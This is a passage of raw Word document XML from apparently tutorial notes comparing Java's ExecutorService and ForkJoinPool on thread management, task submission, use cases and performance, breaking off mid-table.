      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1143"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ExecutorService:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C92E55" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1143"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Threads in an ExecutorService are allocated based on the thread pool type (e.g., fixed-size, cached, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C034F57" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1143"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Threads are reused for multiple tasks, and once a task completes, the thread waits for another task to be assigned.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06079BFE" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1143"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Doesn't optimize for recursive task decomposition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF81B83" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1143"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ForkJoinPool:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0544724B" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1143"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ForkJoinPool uses a </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>work-stealing</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> algorithm, where idle threads can steal tasks from busy threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE16AE8" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1143"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>It’s highly efficient for tasks that can be divided into smaller tasks that can be run in parallel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCF20F2" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1143"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The pool dynamically adjusts based on the number of available processors, meaning it’s designed to take advantage of multi-core systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142FB584" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595"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lastRenderedPageBreak/>
        <w:t>3. Task Submission:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05533504" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1144"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ExecutorService:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6425866F" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1144"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Tasks submitted to an ExecutorService are usually Runnable or Callable objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA34212" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1144"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The service handles the execution, but the tasks are typically independent of each other.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282A55AD" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1144"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ForkJoinPool:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B259CF8" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1144"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Tasks in a ForkJoinPool are ForkJoinTask objects (RecursiveTask or RecursiveAction).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D03CF1A" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1144"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Tasks are usually recursively split into subtasks that are forked and joined. The pool automatically manages the splitting and merging of tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462CFFC5" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595"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4. Use Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475D14FD" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1145"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ExecutorService:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FB0161" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1145"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Suitable for simpler, independent tasks where there is no need for recursive task decomposition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3070CD6A" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1145"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Examples include thread pool management for background tasks, handling large numbers of independent I/O-bound tasks, or running batch jobs that don't need recursive parallelism.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728539EA" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1145"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ForkJoinPool:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0BC11D" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1145"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Best suited for tasks that can be split into smaller, independent sub-tasks that can run concurrently (divide-and-conquer algorithms).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FC6028" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1145"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Examples include parallel sorting (e.g., ForkJoinPool is used for parallel sorting in Java 8), matrix operations, and large-scale computations that involve recursion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1201CAA8" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595"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5. Performance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C846A0" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1146"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ExecutorService:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434A5FC9" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1146"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The regular ExecutorService is more flexible and easier to use for non-recursive tasks, but it may not perform as well as ForkJoinPool when dealing with recursive tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17497EEF" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1146"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ForkJoinPool:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7997534A" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1146"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ForkJoinPool is optimized for divide-and-conquer tasks and is generally more efficient for parallel recursive tasks. It minimizes thread contention through its work-stealing mechanism.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D632E20" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00000000" w:rsidP="004E218C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="2A3A20FB">
          <v:rect id="_x0000_i1831" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="20ED5F5D" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595"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Key Differences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2"/>
        <w:gridCol w:w="3977"/>
        <w:gridCol w:w="4295"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C34595" w:rsidRPr="004E218C" w14:paraId="2CF49B0A" w14:textId="77777777" w:rsidTr="00C34595">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D702F2D" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595"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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63CEBA9F" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595"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ExecutorService</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0CDA4779" w14:textId="77777777" w:rsidR="00C34595" w:rsidRPr="004E218C" w:rsidRDefault="00C34595"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ForkJoinPool</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C34595" w:rsidRPr="004E218C" w14:paraId="10BB5FC1" w14:textId="77777777" w:rsidTr="00C34595">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3EEC9D4F"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Designed for</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="165BAEE7"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General-purpose task execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5651872B"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Recursive and parallel tasks, divide-and-conquer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C34595" w:rsidRPr="004E218C" w14:paraId="78BA90A9" w14:textId="77777777" w:rsidTr="00C34595">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F552E80"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Thread Management</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01E5D7F8"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Threads are allocated in a fixed pool or cached</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="699AF51F"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Uses work-stealing to balance load among threads</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C34595" w:rsidRPr="004E218C" w14:paraId="444C4881" w14:textId="77777777" w:rsidTr="00C34595">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="284C918A"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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Task Submission</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C783593"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Submitting Runnable or Callable tasks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4AAC0518"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Submitting ForkJoinTask (e.g., RecursiveTask)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
